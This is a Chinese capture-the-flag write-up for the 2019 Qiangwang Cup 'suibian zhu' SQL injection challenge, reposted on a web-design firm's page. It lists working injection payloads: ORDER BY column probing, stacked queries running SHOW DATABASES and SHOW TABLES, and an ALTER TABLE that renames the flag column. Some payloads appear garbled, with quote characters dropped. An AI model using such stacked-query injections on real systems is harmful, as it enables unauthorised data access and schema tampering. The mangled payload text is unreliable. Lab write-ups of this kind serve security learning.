资讯动态

[强网杯 2019]随便注_CTF2

发布时间:2026/10/2 23:42:40 来源:尧图企业网站定制
靶场环境easy_sql环境展示解题过程1. 判断注入类型输入1正常回显输入1报错说明存在单引号字符型注入。2. 判断字段数通过order by探测1 order by 1#正常1 order by 2#正常1 order by 3#报错说明当前查询语句有2 个字段。3. 发现过滤机制尝试联合查询1 union select 1,2#返回过滤提示select、update、where、insert等关键字被正则匹配并过滤且不区分大小写。4.查询所有数据库名1; show databases; #5.查看当前数据库中的表?inject-1;show tables;#6.直接查询现在的 words 表拿 flag?inject1;alter table words change flag id varchar(100);访问这个 URL 执行 alter 语句把字段flag改名为id。?inject1or 11;

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价 →
↑